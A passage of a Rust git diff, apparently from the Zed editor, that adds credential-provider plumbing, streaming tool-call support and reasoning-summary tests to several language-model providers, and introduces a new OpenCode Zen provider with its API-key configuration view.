+ }) + ) + }); + assert!( + complete_tool_use.is_some(), + "should have a complete tool use event" + ); + + // All ToolUse events before the final one should have is_input_complete: false + let tool_uses: Vec<_> = mapped + .iter() + .filter(|e| matches!(e, LanguageModelCompletionEvent::ToolUse(_))) + .collect(); + assert!( + tool_uses.len() >= 2, + "should have at least one partial and one complete event" + ); + + let last = tool_uses.last().unwrap(); + assert!(matches!( + last, + LanguageModelCompletionEvent::ToolUse(LanguageModelToolUse { + is_input_complete: true, + .. + }) + )); + } + + #[test] + fn responses_stream_maps_reasoning_summary_deltas() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_123".into()), + summary: vec![], + }), + }, + ResponsesStreamEvent::ReasoningSummaryPartAdded { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 0, + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: "Thinking about".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: " the answer".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDone { + item_id: "rs_123".into(), + output_index: 0, + text: "Thinking about the answer".into(), + }, + ResponsesStreamEvent::ReasoningSummaryPartDone { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 0, + }, + ResponsesStreamEvent::ReasoningSummaryPartAdded { + item_id: "rs_123".into(), + output_index: 0, + summary_index: 1, + }, + ResponsesStreamEvent::ReasoningSummaryTextDelta { + item_id: "rs_123".into(), + output_index: 0, + delta: "Second part".into(), + }, + ResponsesStreamEvent::ReasoningSummaryTextDone { + item_id: "rs_123".into(), + output_index: 0, + text: "Second part".into(), + }, + ResponsesStreamEvent::ReasoningSummaryPartDone { 
+ item_id: "rs_123".into(), + output_index: 0, + summary_index: 1, + }, + ResponsesStreamEvent::OutputItemDone { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_123".into()), + summary: vec![ + ReasoningSummaryPart::SummaryText { + text: "Thinking about the answer".into(), + }, + ReasoningSummaryPart::SummaryText { + text: "Second part".into(), + }, + ], + }), + }, + ResponsesStreamEvent::OutputItemAdded { + output_index: 1, + sequence_number: None, + item: response_item_message("msg_456"), + }, + ResponsesStreamEvent::OutputTextDelta { + item_id: "msg_456".into(), + output_index: 1, + content_index: Some(0), + delta: "The answer is 42".into(), + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + + let thinking_events: Vec<_> = mapped + .iter() + .filter(|e| matches!(e, LanguageModelCompletionEvent::Thinking { .. })) + .collect(); + assert_eq!( + thinking_events.len(), + 4, + "expected 4 thinking events (2 deltas + separator + second delta), got {:?}", + thinking_events, + ); + + assert!(matches!( + &thinking_events[0], + LanguageModelCompletionEvent::Thinking { text, .. } if text == "Thinking about" + )); + assert!(matches!( + &thinking_events[1], + LanguageModelCompletionEvent::Thinking { text, .. } if text == " the answer" + )); + assert!( + matches!( + &thinking_events[2], + LanguageModelCompletionEvent::Thinking { text, .. } if text == "\n\n" + ), + "expected separator between summary parts" + ); + assert!(matches!( + &thinking_events[3], + LanguageModelCompletionEvent::Thinking { text, .. 
} if text == "Second part" + )); + + assert!(mapped.iter().any(|e| matches!( + e, + LanguageModelCompletionEvent::Text(t) if t == "The answer is 42" + ))); + } + + #[test] + fn responses_stream_maps_reasoning_from_done_only() { + let events = vec![ + ResponsesStreamEvent::OutputItemAdded { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_789".into()), + summary: vec![], + }), + }, + ResponsesStreamEvent::OutputItemDone { + output_index: 0, + sequence_number: None, + item: ResponseOutputItem::Reasoning(ResponseReasoningItem { + id: Some("rs_789".into()), + summary: vec![ReasoningSummaryPart::SummaryText { + text: "Summary without deltas".into(), + }], + }), + }, + ResponsesStreamEvent::Completed { + response: ResponseSummary::default(), + }, + ]; + + let mapped = map_response_events(events); + + assert!( + !mapped + .iter() + .any(|e| matches!(e, LanguageModelCompletionEvent::Thinking { .. })), + "OutputItemDone reasoning should not produce Thinking events (no delta/done text events)" + ); + } } diff --git a/crates/language_models/src/provider/open_ai_compatible.rs b/crates/language_models/src/provider/open_ai_compatible.rs index d47ea26c594ab0abb5c859ed549d43e0ed3f859b..1c3268749c3340826cd2f50d29e80eecfa1826d4 100644 --- a/crates/language_models/src/provider/open_ai_compatible.rs +++ b/crates/language_models/src/provider/open_ai_compatible.rs @@ -1,5 +1,6 @@ use anyhow::Result; use convert_case::{Case, Casing}; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; @@ -44,6 +45,7 @@ pub struct State { id: Arc, api_key_state: ApiKeyState, settings: OpenAiCompatibleSettings, + credentials_provider: Arc, } impl State { @@ -52,20 +54,36 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let 
credentials_provider = self.credentials_provider.clone(); let api_url = SharedString::new(self.settings.api_url.as_str()); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = SharedString::new(self.settings.api_url.clone()); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl OpenAiCompatibleLanguageModelProvider { - pub fn new(id: Arc, http_client: Arc, cx: &mut App) -> Self { + pub fn new( + id: Arc, + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { fn resolve_settings<'a>(id: &'a str, cx: &'a App) -> Option<&'a OpenAiCompatibleSettings> { crate::AllLanguageModelSettings::get_global(cx) .openai_compatible @@ -79,10 +97,12 @@ impl OpenAiCompatibleLanguageModelProvider { return; }; if &this.settings != &settings { + let credentials_provider = this.credentials_provider.clone(); let api_url = SharedString::new(settings.api_url.as_str()); this.api_key_state.handle_url_change( api_url, |this| &mut this.api_key_state, + credentials_provider, cx, ); this.settings = settings; @@ -98,6 +118,7 @@ impl OpenAiCompatibleLanguageModelProvider { EnvVar::new(api_key_env_var_name), ), settings, + credentials_provider, } }); @@ -319,6 +340,10 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_split_token_display(&self) -> bool { true } @@ -377,7 +402,7 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { self.model.capabilities.parallel_tool_calls, self.model.capabilities.prompt_cache_key, self.max_output_tokens(), - None, + 
self.model.reasoning_effort.clone(), ); let completions = self.stream_completion(request, cx); async move { @@ -392,7 +417,7 @@ impl LanguageModel for OpenAiCompatibleLanguageModel { self.model.capabilities.parallel_tool_calls, self.model.capabilities.prompt_cache_key, self.max_output_tokens(), - None, + self.model.reasoning_effort.clone(), ); let completions = self.stream_response(request, cx); async move { @@ -541,9 +566,7 @@ impl Render for ConfigurationView { .child( Button::new("reset-api-key", "Reset API Key") .label_size(LabelSize::Small) - .icon(IconName::Undo) - .icon_size(IconSize::Small) - .icon_position(IconPosition::Start) + .start_icon(Icon::new(IconName::Undo).size(IconSize::Small)) .layer(ElevationIndex::ModalSurface) .when(env_var_set, |this| { this.tooltip(Tooltip::text(format!("To reset your API key, unset the {env_var_name} environment variable."))) diff --git a/crates/language_models/src/provider/open_router.rs b/crates/language_models/src/provider/open_router.rs index a044c7c25d7858f69dc8c4ac9fa0c8bda73f6e91..09c8eb768d12c61ed1dc86a1251ad52114be6162 100644 --- a/crates/language_models/src/provider/open_router.rs +++ b/crates/language_models/src/provider/open_router.rs @@ -1,5 +1,6 @@ -use anyhow::{Result, anyhow}; +use anyhow::Result; use collections::HashMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task}; use http_client::HttpClient; @@ -21,7 +22,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openrouter"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenRouter"); @@ -42,6 +43,7 @@ pub struct 
OpenRouterLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_models_task: Option>>, @@ -53,16 +55,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenRouterLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = OpenRouterLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.spawn(async move |this, cx| { let result = task.await; @@ -114,7 +126,11 @@ impl State { } impl OpenRouterLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::({ let mut last_settings = OpenRouterLanguageModelProvider::settings(cx).clone(); @@ -131,6 +147,7 @@ impl OpenRouterLanguageModelProvider { .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, http_client: http_client.clone(), available_models: Vec::new(), fetch_models_task: None, @@ -314,6 +331,10 @@ impl LanguageModel for OpenRouterLanguageModel { self.model.supports_tool_calls() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_thinking(&self) -> bool { matches!(self.model.mode, OpenRouterModelMode::Thinking { .. 
}) } @@ -591,14 +612,21 @@ impl OpenRouterEventMapper { &mut self, event: ResponseStreamEvent, ) -> Vec> { + let mut events = Vec::new(); + + if let Some(usage) = event.usage { + events.push(Ok(LanguageModelCompletionEvent::UsageUpdate(TokenUsage { + input_tokens: usage.prompt_tokens, + output_tokens: usage.completion_tokens, + cache_creation_input_tokens: 0, + cache_read_input_tokens: 0, + }))); + } + let Some(choice) = event.choices.first() else { - return vec![Err(LanguageModelCompletionError::from(anyhow!( - "Response contained no choices" - )))]; + return events; }; - let mut events = Vec::new(); - if let Some(details) = choice.delta.reasoning_details.clone() { // Emit reasoning_details immediately events.push(Ok(LanguageModelCompletionEvent::ReasoningDetails( @@ -643,16 +671,24 @@ impl OpenRouterEventMapper { entry.thought_signature = Some(signature); } } - } - } - if let Some(usage) = event.usage { - events.push(Ok(LanguageModelCompletionEvent::UsageUpdate(TokenUsage { - input_tokens: usage.prompt_tokens, - output_tokens: usage.completion_tokens, - cache_creation_input_tokens: 0, - cache_read_input_tokens: 0, - }))); + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: entry.thought_signature.clone(), + }, + ))); + } + } + } } match choice.finish_reason.as_deref() { @@ -891,7 +927,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -916,7 +952,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 
1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -942,7 +978,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -969,7 +1005,7 @@ mod tests { ResponseStreamEvent { id: Some("response_123".into()), created: 1234567890, - model: "google/gemini-3-pro-preview".into(), + model: "google/gemini-3.1-pro-preview".into(), choices: vec![ChoiceDelta { index: 0, delta: ResponseMessageDelta { @@ -1055,6 +1091,32 @@ mod tests { ); } + #[gpui::test] + async fn test_usage_only_chunk_with_empty_choices_does_not_error() { + let mut mapper = OpenRouterEventMapper::new(); + + let events = mapper.map_event(ResponseStreamEvent { + id: Some("response_123".into()), + created: 1234567890, + model: "google/gemini-3-flash-preview".into(), + choices: Vec::new(), + usage: Some(open_router::Usage { + prompt_tokens: 12, + completion_tokens: 7, + total_tokens: 19, + }), + }); + + assert_eq!(events.len(), 1); + match events.into_iter().next().unwrap() { + Ok(LanguageModelCompletionEvent::UsageUpdate(usage)) => { + assert_eq!(usage.input_tokens, 12); + assert_eq!(usage.output_tokens, 7); + } + other => panic!("Expected usage update event, got: {other:?}"), + } + } + #[gpui::test] async fn test_agent_prevents_empty_reasoning_details_overwrite() { // This test verifies that the agent layer prevents empty reasoning_details diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs new file mode 100644 index 0000000000000000000000000000000000000000..aae3a552544ebf2cc59255da954d84cf7b78c7da --- /dev/null +++ b/crates/language_models/src/provider/opencode.rs @@ -0,0 +1,669 @@ +use anyhow::Result; +use 
collections::BTreeMap; +use credentials_provider::CredentialsProvider; +use futures::{FutureExt, StreamExt, future::BoxFuture}; +use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; +use http_client::HttpClient; +use language_model::{ + ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, + LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, + LanguageModelRequest, LanguageModelToolChoice, RateLimiter, Role, env_var, +}; +use opencode::{ApiProtocol, OPENCODE_API_URL}; +pub use settings::OpenCodeAvailableModel as AvailableModel; +use settings::{Settings, SettingsStore}; +use std::sync::{Arc, LazyLock}; +use strum::IntoEnumIterator; +use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; +use ui_input::InputField; +use util::ResultExt; + +use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic}; +use crate::provider::google::{GoogleEventMapper, into_google}; +use crate::provider::open_ai::{ + OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response, +}; + +const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); +const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode Zen"); + +const API_KEY_ENV_VAR_NAME: &str = "OPENCODE_API_KEY"; +static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); + +#[derive(Default, Clone, Debug, PartialEq)] +pub struct OpenCodeSettings { + pub api_url: String, + pub available_models: Vec, +} + +pub struct OpenCodeLanguageModelProvider { + http_client: Arc, + state: Entity, +} + +pub struct State { + api_key_state: ApiKeyState, + credentials_provider: Arc, +} + +impl State { + fn is_authenticated(&self) -> bool { + self.api_key_state.has_key() + } + + fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + 
let credentials_provider = self.credentials_provider.clone(); + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) + } + + fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) + } +} + +impl OpenCodeLanguageModelProvider { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { + let state = cx.new(|cx| { + cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + cx.notify(); + }) + .detach(); + State { + api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, + } + }); + + Self { http_client, state } + } + + fn create_language_model(&self, model: opencode::Model) -> Arc { + Arc::new(OpenCodeLanguageModel { + id: LanguageModelId::from(model.id().to_string()), + model, + state: self.state.clone(), + http_client: self.http_client.clone(), + request_limiter: RateLimiter::new(4), + }) + } + + pub fn settings(cx: &App) -> &OpenCodeSettings { + &crate::AllLanguageModelSettings::get_global(cx).opencode + } + + fn api_url(cx: &App) -> SharedString { + let api_url = &Self::settings(cx).api_url; + if api_url.is_empty() { + OPENCODE_API_URL.into() + } else { + SharedString::new(api_url.as_str()) + } + } +} + +impl LanguageModelProviderState for OpenCodeLanguageModelProvider { + type ObservableEntity = State; + + fn observable_entity(&self) -> Option> { + Some(self.state.clone()) + } +} + +impl LanguageModelProvider for 
OpenCodeLanguageModelProvider { + fn id(&self) -> LanguageModelProviderId { + PROVIDER_ID + } + + fn name(&self) -> LanguageModelProviderName { + PROVIDER_NAME + } + + fn icon(&self) -> IconOrSvg { + IconOrSvg::Icon(IconName::AiOpenCode) + } + + fn default_model(&self, _cx: &App) -> Option> { + Some(self.create_language_model(opencode::Model::default())) + } + + fn default_fast_model(&self, _cx: &App) -> Option> { + Some(self.create_language_model(opencode::Model::default_fast())) + } + + fn provided_models(&self, cx: &App) -> Vec> { + let mut models = BTreeMap::default(); + + for model in opencode::Model::iter() { + if !matches!(model, opencode::Model::Custom { .. }) { + models.insert(model.id().to_string(), model); + } + } + + for model in &Self::settings(cx).available_models { + let protocol = match model.protocol.as_str() { + "anthropic" => ApiProtocol::Anthropic, + "openai_responses" => ApiProtocol::OpenAiResponses, + "openai_chat" => ApiProtocol::OpenAiChat, + "google" => ApiProtocol::Google, + _ => ApiProtocol::OpenAiChat, // default fallback + }; + models.insert( + model.name.clone(), + opencode::Model::Custom { + name: model.name.clone(), + display_name: model.display_name.clone(), + max_tokens: model.max_tokens, + max_output_tokens: model.max_output_tokens, + protocol, + }, + ); + } + + models + .into_values() + .map(|model| self.create_language_model(model)) + .collect() + } + + fn is_authenticated(&self, cx: &App) -> bool { + self.state.read(cx).is_authenticated() + } + + fn authenticate(&self, cx: &mut App) -> Task> { + self.state.update(cx, |state, cx| state.authenticate(cx)) + } + + fn configuration_view( + &self, + _target_agent: language_model::ConfigurationViewTargetAgent, + window: &mut Window, + cx: &mut App, + ) -> AnyView { + cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx)) + .into() + } + + fn reset_credentials(&self, cx: &mut App) -> Task> { + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) + } +} + +pub 
struct OpenCodeLanguageModel { + id: LanguageModelId, + model: opencode::Model, + state: Entity, + http_client: Arc, + request_limiter: RateLimiter, +} + +impl OpenCodeLanguageModel { + /// Returns the base API URL (e.g., "https://opencode.ai/zen"). + fn base_api_url(&self, cx: &AsyncApp) -> SharedString { + self.state + .read_with(cx, |_, cx| OpenCodeLanguageModelProvider::api_url(cx)) + } + + fn api_key(&self, cx: &AsyncApp) -> Option> { + self.state.read_with(cx, |state, cx| { + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + state.api_key_state.key(&api_url) + }) + } + + fn stream_anthropic( + &self, + request: anthropic::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result< + futures::stream::BoxStream< + 'static, + Result, + >, + LanguageModelCompletionError, + >, + > { + let http_client = self.http_client.clone(); + // Anthropic crate appends /v1/messages to api_url + let api_url = self.base_api_url(cx); + let api_key = self.api_key(cx); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = anthropic::stream_completion( + http_client.as_ref(), + &api_url, + &api_key, + request, + None, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_openai_chat( + &self, + request: open_ai::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + // OpenAI crate appends /chat/completions to api_url, so we pass base + "/v1" + let base_url = self.base_api_url(cx); + let api_url: SharedString = format!("{base_url}/v1").into(); + let api_key = self.api_key(cx); + let provider_name = PROVIDER_NAME.0.to_string(); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + 
provider: PROVIDER_NAME, + }); + }; + let request = open_ai::stream_completion( + http_client.as_ref(), + &provider_name, + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_openai_response( + &self, + request: open_ai::responses::Request, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + // Responses crate appends /responses to api_url, so we pass base + "/v1" + let base_url = self.base_api_url(cx); + let api_url: SharedString = format!("{base_url}/v1").into(); + let api_key = self.api_key(cx); + let provider_name = PROVIDER_NAME.0.to_string(); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = open_ai::responses::stream_response( + http_client.as_ref(), + &provider_name, + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } + + fn stream_google_zen( + &self, + request: google_ai::GenerateContentRequest, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result>>, + > { + let http_client = self.http_client.clone(); + let api_url = self.base_api_url(cx); + let api_key = self.api_key(cx); + + let future = self.request_limiter.stream(async move { + let Some(api_key) = api_key else { + return Err(LanguageModelCompletionError::NoApiKey { + provider: PROVIDER_NAME, + }); + }; + let request = opencode::stream_generate_content_zen( + http_client.as_ref(), + &api_url, + &api_key, + request, + ); + let response = request.await?; + Ok(response) + }); + + async move { Ok(future.await?.boxed()) }.boxed() + } +} + +impl LanguageModel for OpenCodeLanguageModel { + fn id(&self) -> LanguageModelId { + self.id.clone() + } + + fn name(&self) -> LanguageModelName { + 
LanguageModelName::from(self.model.display_name().to_string()) + } + + fn provider_id(&self) -> LanguageModelProviderId { + PROVIDER_ID + } + + fn provider_name(&self) -> LanguageModelProviderName { + PROVIDER_NAME + } + + fn supports_tools(&self) -> bool { + self.model.supports_tools() + } + + fn supports_images(&self) -> bool { + self.model.supports_images() + } + + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { + match choice { + LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, + LanguageModelToolChoice::None => { + // Google models don't support None tool choice + self.model.protocol() != ApiProtocol::Google + } + } + } + + fn telemetry_id(&self) -> String { + format!("opencode/{}", self.model.id()) + } + + fn max_token_count(&self) -> u64 { + self.model.max_token_count() + } + + fn max_output_tokens(&self) -> Option { + self.model.max_output_tokens() + } + + fn count_tokens( + &self, + request: LanguageModelRequest, + cx: &App, + ) -> BoxFuture<'static, Result> { + cx.background_spawn(async move { + let messages = request + .messages + .into_iter() + .map(|message| tiktoken_rs::ChatCompletionRequestMessage { + role: match message.role { + Role::User => "user".into(), + Role::Assistant => "assistant".into(), + Role::System => "system".into(), + }, + content: Some(message.string_contents()), + name: None, + function_call: None, + }) + .collect::>(); + + tiktoken_rs::num_tokens_from_messages("gpt-4o", &messages).map(|tokens| tokens as u64) + }) + .boxed() + } + + fn stream_completion( + &self, + request: LanguageModelRequest, + cx: &AsyncApp, + ) -> BoxFuture< + 'static, + Result< + futures::stream::BoxStream< + 'static, + Result, + >, + LanguageModelCompletionError, + >, + > { + match self.model.protocol() { + ApiProtocol::Anthropic => { + let anthropic_request = into_anthropic( + request, + self.model.id().to_string(), + 1.0, + self.model.max_output_tokens().unwrap_or(8192), + 
anthropic::AnthropicModelMode::Default, + ); + let stream = self.stream_anthropic(anthropic_request, cx); + async move { + let mapper = AnthropicEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::OpenAiChat => { + let openai_request = into_open_ai( + request, + self.model.id(), + false, + false, + self.model.max_output_tokens(), + None, + ); + let stream = self.stream_openai_chat(openai_request, cx); + async move { + let mapper = OpenAiEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::OpenAiResponses => { + let response_request = into_open_ai_response( + request, + self.model.id(), + false, + false, + self.model.max_output_tokens(), + None, + ); + let stream = self.stream_openai_response(response_request, cx); + async move { + let mapper = OpenAiResponseEventMapper::new(); + Ok(mapper.map_stream(stream.await?).boxed()) + } + .boxed() + } + ApiProtocol::Google => { + let google_request = into_google( + request, + self.model.id().to_string(), + google_ai::GoogleModelMode::Default, + ); + let stream = self.stream_google_zen(google_request, cx); + async move { + let mapper = GoogleEventMapper::new(); + Ok(mapper.map_stream(stream.await?.boxed()).boxed()) + } + .boxed() + } + } + } +} + +struct ConfigurationView { + api_key_editor: Entity, + state: Entity, + load_credentials_task: Option>, +} + +impl ConfigurationView { + fn new(state: Entity, window: &mut Window, cx: &mut Context) -> Self { + let api_key_editor = cx.new(|cx| { + InputField::new(window, cx, "sk-00000000000000000000000000000000").label("API key") + }); + + cx.observe(&state, |_, _, cx| { + cx.notify(); + }) + .detach(); + + let load_credentials_task = Some(cx.spawn_in(window, { + let state = state.clone(); + async move |this, cx| { + if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) { + let _ = task.await; + } + this.update(cx, |this, cx| { + this.load_credentials_task = None; 
+ cx.notify(); + }) + .log_err(); + } + })); + + Self { + api_key_editor, + state, + load_credentials_task, + } + } + + fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { + let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); + if api_key.is_empty() { + return; + } + + self.api_key_editor + .update(cx, |editor, cx| editor.set_text("", window, cx)); + + let state = self.state.clone(); + cx.spawn_in(window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context) { + self.api_key_editor + .update(cx, |editor, cx| editor.set_text("", window, cx)); + + let state = self.state.clone(); + cx.spawn_in(window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn should_render_editor(&self, cx: &mut Context) -> bool { + !self.state.read(cx).is_authenticated() + } +} + +impl Render for ConfigurationView { + fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { + let env_var_set = self.state.read(cx).api_key_state.is_from_env_var(); + let configured_card_label = if env_var_set { + format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable") + } else { + let api_url = OpenCodeLanguageModelProvider::api_url(cx); + if api_url == OPENCODE_API_URL { + "API key configured".to_string() + } else { + format!("API key configured for {}", api_url) + } + }; + + let api_key_section = if self.should_render_editor(cx) { + v_flex() + .on_action(cx.listener(Self::save_api_key)) + .child(Label::new( + "To use OpenCode Zen models in Zed, you need an API key:", + )) + .child( + List::new() + .child( + ListBulletItem::new("") + .child(Label::new("Sign in and get your key at")) + .child(ButtonLink::new( + "OpenCode Zen Console", + "https://opencode.ai/zen", + )), + ) + 
.child(ListBulletItem::new( + "Paste your API key below and hit enter to start using OpenCode Zen", + )), + ) + .child(self.api_key_editor.clone()) + .child( + Label::new(format!( + "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." + )) + .size(LabelSize::Small) + .color(Color::Muted), + ) + .into_any_element() + } else { + ConfiguredApiCard::new(configured_card_label) + .disabled(env_var_set) + .when(env_var_set, |this| { + this.tooltip_label(format!( + "To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable." + )) + }) + .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx))) + .into_any_element() + }; + + if self.load_credentials_task.is_some() { + div().child(Label::new("Loading credentials...")).into_any() + } else { + v_flex().size_full().child(api_key_section).into_any() + } + } +} diff --git a/crates/language_models/src/provider/util.rs b/crates/language_models/src/provider/util.rs index 6b1cf7afbb7e3a068dabbc6787c322649d50393d..76a02b6de40a3e36c7c506f11a6f6d34d2aaca3e 100644 --- a/crates/language_models/src/provider/util.rs +++ b/crates/language_models/src/provider/util.rs @@ -11,3 +11,99 @@ pub fn parse_tool_arguments(arguments: &str) -> Result String { + let json = strip_trailing_incomplete_escape(partial_json); + partial_json_fixer::fix_json(json) +} + +fn strip_trailing_incomplete_escape(json: &str) -> &str { + let trailing_backslashes = json + .as_bytes() + .iter() + .rev() + .take_while(|&&b| b == b'\\') + .count(); + if trailing_backslashes % 2 == 1 { + &json[..json.len() - 1] + } else { + json + } +} + +#[cfg(test)] +mod tests { + use 